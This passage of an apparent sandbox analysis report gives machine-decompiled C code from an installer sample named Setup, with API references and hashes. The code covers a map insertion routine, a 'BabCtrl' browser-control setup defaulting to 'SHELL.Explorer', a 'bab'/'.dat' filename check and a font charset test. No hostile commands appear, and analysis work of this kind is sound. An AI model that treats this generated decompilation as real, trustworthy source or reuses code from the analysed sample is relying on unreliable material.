                                                                                                                                                              						_t156 = E00409110(_a12);
                                                                                                                                                              						_t323 = _t300 + 0x10;
                                                                                                                                                              						if( *_t156 != 0) {
                                                                                                                                                              							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t325 = _t323 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t159;
                                                                                                                                                              							if(_v24 ==  *_t159) {
                                                                                                                                                              								_t171 = E0042AE30(_v24);
                                                                                                                                                              								_t325 = _t325 + 4;
                                                                                                                                                              								_v24 =  *_t171;
                                                                                                                                                              								E004091A0(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t325 + 0x1c;
                                                                                                                                                              							E00409350(_v96, __eflags,  *_t168);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00409110(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t323 + 0x20;
                                                                                                                                                              							_v24 =  *_t184;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(E00409110( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
                                                                                                                                                              				E00445360(_a4, _v20);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}






































                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00431A65
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AB9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AC6
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AD3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AFB
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431B0A
                                                                                                                                                                • Part of subcall function 00409350: HandleT.LIBCPMTD ref: 004093E4
                                                                                                                                                                • Part of subcall function 00409350: HandleT.LIBCPMTD ref: 004093F3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431B2A
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431B39
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431E3C
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00431E56
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: 5541c3eff9ac2d1f3906ca3eb5334e432a890d749b25990acfb3e491166c11ad
                                                                                                                                                              • Instruction ID: e4a790a359245b49f7060f943024f6769a204ec36205df451c937a2456567c87
                                                                                                                                                              • Opcode Fuzzy Hash: 5541c3eff9ac2d1f3906ca3eb5334e432a890d749b25990acfb3e491166c11ad
                                                                                                                                                              • Instruction Fuzzy Hash: 10E183F5E00144AFDB04EFA1E88296FB376AF89308F14446DE8055F356EA39ED11CB66
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E0041CFA0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				signed int _t94;
                                                                                                                                                              				intOrPtr* _t103;
                                                                                                                                                              				intOrPtr* _t104;
                                                                                                                                                              				char* _t107;
                                                                                                                                                              				intOrPtr* _t113;
                                                                                                                                                              				intOrPtr* _t117;
                                                                                                                                                              				char* _t122;
                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                              				intOrPtr* _t134;
                                                                                                                                                              				intOrPtr* _t137;
                                                                                                                                                              				intOrPtr* _t149;
                                                                                                                                                              				char* _t156;
                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                              				intOrPtr* _t168;
                                                                                                                                                              				intOrPtr* _t171;
                                                                                                                                                              				intOrPtr* _t184;
                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                              				intOrPtr* _t188;
                                                                                                                                                              				signed int _t291;
                                                                                                                                                              				void* _t292;
                                                                                                                                                              				void* _t293;
                                                                                                                                                              				void* _t295;
                                                                                                                                                              				void* _t300;
                                                                                                                                                              				void* _t304;
                                                                                                                                                              				void* _t306;
                                                                                                                                                              				void* _t323;
                                                                                                                                                              				void* _t325;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x517298);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t293 = _t292 - 0x50;
                                                                                                                                                              				_t94 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t94 ^ _t291);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v96 = __ecx;
                                                                                                                                                              				if(E0041D730(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
                                                                                                                                                              					E004134D0( &_v92, "map/set<T> too long");
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E00413D50( &_v92);
                                                                                                                                                              					E00456A4C( &_v64, 0x544b50);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00413C20( &_v92);
                                                                                                                                                              				}
                                                                                                                                                              				_v20 = E0041DB60( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
                                                                                                                                                              				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
                                                                                                                                                              				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
                                                                                                                                                              					__eflags = _a8 & 0x000000ff;
                                                                                                                                                              					if((_a8 & 0x000000ff) == 0) {
                                                                                                                                                              						_t103 = E00441910(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t103 = _v20;
                                                                                                                                                              						_t104 = E00433720(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t104;
                                                                                                                                                              						if(_a12 ==  *_t104) {
                                                                                                                                                              							 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t187 = E00415110(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t187 = _v20;
                                                                                                                                                              						_t188 = E00433680(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t188;
                                                                                                                                                              						if(_a12 ==  *_t188) {
                                                                                                                                                              							 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = _v20;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t107 = E0041D720( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              					_t295 = _t293 + 8;
                                                                                                                                                              					if( *_t107 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t113 = E0042AE30(_v24);
                                                                                                                                                              					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
                                                                                                                                                              					_t300 = _t295 + 0x10;
                                                                                                                                                              					if( *_t113 !=  *_t117) {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t122 = E0041D720(_a12);
                                                                                                                                                              						_t304 = _t300 + 0x10;
                                                                                                                                                              						__eflags =  *_t122;
                                                                                                                                                              						if( *_t122 != 0) {
                                                                                                                                                              							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t306 = _t304 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t125;
                                                                                                                                                              							if(_v24 ==  *_t125) {
                                                                                                                                                              								_t137 = E0042AE30(_v24);
                                                                                                                                                              								_t306 = _t306 + 4;
                                                                                                                                                              								_v24 =  *_t137;
                                                                                                                                                              								E0041DA30(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t306 + 0x1c;
                                                                                                                                                              							E0041D900(_v96, __eflags,  *_t134);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0041D720(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t304 + 0x20;
                                                                                                                                                              							_v24 =  *_t149;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t156 = E0041D720(_a12);
                                                                                                                                                              						_t323 = _t300 + 0x10;
                                                                                                                                                              						if( *_t156 != 0) {
                                                                                                                                                              							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t325 = _t323 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t159;
                                                                                                                                                              							if(_v24 ==  *_t159) {
                                                                                                                                                              								_t171 = E0042AE30(_v24);
                                                                                                                                                              								_t325 = _t325 + 4;
                                                                                                                                                              								_v24 =  *_t171;
                                                                                                                                                              								E0041D900(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t325 + 0x1c;
                                                                                                                                                              							E0041DA30(_v96, __eflags,  *_t168);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0041D720(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t323 + 0x20;
                                                                                                                                                              							_v24 =  *_t184;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(E0041D720( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
                                                                                                                                                              				E00445360(_a4, _v20);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}






































                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0041D005
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D059
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D066
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D073
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D09B
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D0AA
                                                                                                                                                                • Part of subcall function 0041DA30: HandleT.LIBCPMTD ref: 0041DAC4
                                                                                                                                                                • Part of subcall function 0041DA30: HandleT.LIBCPMTD ref: 0041DAD3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D0CA
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D0D9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D3DC
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 0041D3F6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: b8bd37fcb15f34cd53e11df0cd1955b9fc464ef3865191caa10b3315eeb2d2cc
                                                                                                                                                              • Instruction ID: e5d37839dca9f35039a431e2513190f11395736884d950e5dcdd22d0a0dad3d5
                                                                                                                                                              • Opcode Fuzzy Hash: b8bd37fcb15f34cd53e11df0cd1955b9fc464ef3865191caa10b3315eeb2d2cc
                                                                                                                                                              • Instruction Fuzzy Hash: 7EE1B7F5E00144AFDB04EFA1E8829AF7376AF89308F14446DF8155B352DA39ED11CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E00409BF0(struct HWND__* _a4, int _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, char* _a24) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				struct HWND__* _v48;
                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                              				intOrPtr* _v56;
                                                                                                                                                              				char* _v60;
                                                                                                                                                              				intOrPtr* _v64;
                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                              				signed int _t71;
                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                              				void* _t102;
                                                                                                                                                              				void* _t141;
                                                                                                                                                              				signed int _t142;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t144;
                                                                                                                                                              				void* _t145;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5183f8);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t144 = _t143 - 0x34;
                                                                                                                                                              				_t71 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t71 ^ _t142);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_t149 = _a8 - 0xffffffff;
                                                                                                                                                              				if(_a8 != 0xffffffff) {
                                                                                                                                                              					_v48 = GetDlgItem(_a4, _a8);
                                                                                                                                                              				} else {
                                                                                                                                                              					_v48 = _a4;
                                                                                                                                                              				}
                                                                                                                                                              				E0040A2C0( &_v28, _t141, _t149, _v48);
                                                                                                                                                              				E00414C90();
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v24 = E0040A2F0( &_v28, 0x53b524, 0, E00434050( &_v32));
                                                                                                                                                              				if(_v24 >= 0) {
                                                                                                                                                              					_push(L"BabCtrl :: control created..");
                                                                                                                                                              					E004CC5C0(_t79);
                                                                                                                                                              					_t145 = _t144 + 4;
                                                                                                                                                              					__eflags = _a16;
                                                                                                                                                              					if(_a16 == 0) {
                                                                                                                                                              						_v52 = 0x80070057;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v52 = E0040A320( &_v28, _a16);
                                                                                                                                                              					}
                                                                                                                                                              					_t81 = _v52;
                                                                                                                                                              					_v24 = _v52;
                                                                                                                                                              					__eflags = _v24;
                                                                                                                                                              					if(_v24 < 0) {
                                                                                                                                                              						_push(L"BabCtr:: fail to set uihandler");
                                                                                                                                                              						_t81 = E004CC5C0(_t81);
                                                                                                                                                              						_t145 = _t145 + 4;
                                                                                                                                                              					}
                                                                                                                                                              					_push(L"BabCtrl :: set external OK ..");
                                                                                                                                                              					E004CC5C0(_t81);
                                                                                                                                                              					__eflags = _a20;
                                                                                                                                                              					if(_a20 != 0) {
                                                                                                                                                              						E0040A5D0(E0041D530( &_v32));
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						_t97 = E0041D530( &_v36);
                                                                                                                                                              						__eflags = _t97;
                                                                                                                                                              						if(_t97 == 0) {
                                                                                                                                                              							_push(L"BabCtrl :: set host Failed ..");
                                                                                                                                                              							E004CC5C0(_t97);
                                                                                                                                                              						} else {
                                                                                                                                                              							_v56 = E0041D530( &_v36);
                                                                                                                                                              							_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0xc))))(_v56, _a20);
                                                                                                                                                              							_push(L"BabCtrl :: set Host OK ..");
                                                                                                                                                              							E004CC5C0(_t102);
                                                                                                                                                              						}
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E00439240();
                                                                                                                                                              					}
                                                                                                                                                              					E0040A640(E0041D530( &_v32));
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					_t85 = E0041D530( &_v20);
                                                                                                                                                              					__eflags = _t85;
                                                                                                                                                              					if(_t85 != 0) {
                                                                                                                                                              						__eflags = _a24;
                                                                                                                                                              						if(_a24 == 0) {
                                                                                                                                                              							_v60 = L"SHELL.Explorer";
                                                                                                                                                              						} else {
                                                                                                                                                              							_v60 = _a24;
                                                                                                                                                              						}
                                                                                                                                                              						_v64 = E0041D530( &_v20);
                                                                                                                                                              						_t56 =  *_v64 + 0xc; // 0x780045
                                                                                                                                                              						 *((intOrPtr*)( *_t56))(_v64, _v60, _a4, 0);
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _a12;
                                                                                                                                                              					if(_a12 == 0) {
                                                                                                                                                              						_v68 = 0x80070057;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v68 = E0040A960( &_v28, _a12);
                                                                                                                                                              					}
                                                                                                                                                              					_v44 = _v68;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E00439240();
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_t88 = _v44;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v40 = _v24;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_t88 = _v40;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t88;
                                                                                                                                                              			}





























                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Item
                                                                                                                                                              • String ID: BabCtr:: fail to set uihandler$BabCtrl :: control created..$BabCtrl :: set Host OK ..$BabCtrl :: set external OK ..$BabCtrl :: set host Failed ..$W$W
                                                                                                                                                              • API String ID: 3207170592-2923569185
                                                                                                                                                              • Opcode ID: c5f6a6eb2dd4e3054d342fafb51bad6f9197b658f9e0fcfc39563db65e5f1383
                                                                                                                                                              • Instruction ID: eaf740cecb094d001f17b7b0570d5d8f32ad036a3cbaf856ee7f5ccacbc46b22
                                                                                                                                                              • Opcode Fuzzy Hash: c5f6a6eb2dd4e3054d342fafb51bad6f9197b658f9e0fcfc39563db65e5f1383
                                                                                                                                                              • Instruction Fuzzy Hash: 6F614C71D00209EBDB04EFA5D881AEEB7B0BF58318F10812EE416772D1EB386E45CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004CE260(WCHAR* _a4) {
                                                                                                                                                              				signed short* _v8;
                                                                                                                                                              				WCHAR* _v12;
                                                                                                                                                              				signed short* _v16;
                                                                                                                                                              				WCHAR* _v20;
                                                                                                                                                              
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v12 = PathFindFileNameW(_a4);
                                                                                                                                                              				_v20 = PathFindExtensionW(_a4);
                                                                                                                                                              				_t49 = _v12;
                                                                                                                                                              				if(E00452779(_v12, _v12, L"bab", 3) != 0 || E00452266(_t49, _v20, L".dat") != 0) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v16 = 0;
                                                                                                                                                              					if(_v20 - _v12 >> 1 != 5) {
                                                                                                                                                              						_v8 = E00451CBD(_v12 + 6,  &_v16, 0xa);
                                                                                                                                                              						if(_v8 <= 0 || _v16 != _v12 + 0xc || ( *_v16 & 0x0000ffff) != 0x2e) {
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_v8 = E00451CBD(_v12 + 6,  &_v16, 0x10);
                                                                                                                                                              						if(_v8 <= 0 || _v16 != _v20) {
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					return _v8;
                                                                                                                                                              				}
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FindPath__wcstoi64$ExtensionFileName__wcsicoll__wcsnicmpwcstoxl
                                                                                                                                                              • String ID: .dat$bab
                                                                                                                                                              • API String ID: 449826006-2189697214
                                                                                                                                                              • Opcode ID: 6e201137cf9664afb1ec1b3c086d1d47f06f8660c52b2b8d762d5414cb5a3b35
                                                                                                                                                              • Instruction ID: df4a38ea496df72c73f4a7d825426fae90e2c63b5b2ab31b804925f12fd1acf7
                                                                                                                                                              • Opcode Fuzzy Hash: 6e201137cf9664afb1ec1b3c086d1d47f06f8660c52b2b8d762d5414cb5a3b35
                                                                                                                                                              • Instruction Fuzzy Hash: 58217C75D00208EBDF40DFA9C985FAEB7B8AF04304F14849EE802A7381E778AB45CB45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004244C0(signed char _a4) {
                                                                                                                                                              				struct HDC__* _v8;
                                                                                                                                                              				struct HFONT__* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				int _v20;
                                                                                                                                                              
                                                                                                                                                              				_t1 =  &_a4; // 0x42467e
                                                                                                                                                              				if(( *_t1 & 0x000000ff) != 0) {
                                                                                                                                                              					_t2 =  &_a4; // 0x42467e
                                                                                                                                                              					_v12 = CreateFontW(0, 0, 0, 0, 0, 0, 0, 0,  *_t2 & 0x000000ff, 0, 0, 0, 0, 0);
                                                                                                                                                              					if(_v12 != 0) {
                                                                                                                                                              						_v8 = GetDC(0);
                                                                                                                                                              						_v16 = SelectObject(_v8, _v12);
                                                                                                                                                              						_v20 = GetTextCharset(_v8);
                                                                                                                                                              						SelectObject(_v8, _v16);
                                                                                                                                                              						ReleaseDC(0, _v8);
                                                                                                                                                              						DeleteObject(_v12);
                                                                                                                                                              						if(_v20 == (_a4 & 0x000000ff)) {
                                                                                                                                                              							return 1;
                                                                                                                                                              						}
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				return 1;
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,~FB,00000000,00000000,00000000,00000000,00000000), ref: 004244F7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFont
                                                                                                                                                              • String ID: ~FB
                                                                                                                                                              • API String ID: 1830492434-2682213495
                                                                                                                                                              • Opcode ID: 2761a6f0ecc8792617914d0c4bf0b4833e8627f24a0be996a018f82cc7637a97
                                                                                                                                                              • Instruction ID: f253bb138a9ababeb2fa7b0379442bbb036eb631f144d967374e47d3ec1cdec6
                                                                                                                                                              • Opcode Fuzzy Hash: 2761a6f0ecc8792617914d0c4bf0b4833e8627f24a0be996a018f82cc7637a97
                                                                                                                                                              • Instruction Fuzzy Hash: 68115178A04218FFDB40DFB4D848BAEBBB4EB48741F108496F959D6240D7749A84AB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004250E0(WCHAR* _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				struct HINSTANCE__* _v12;
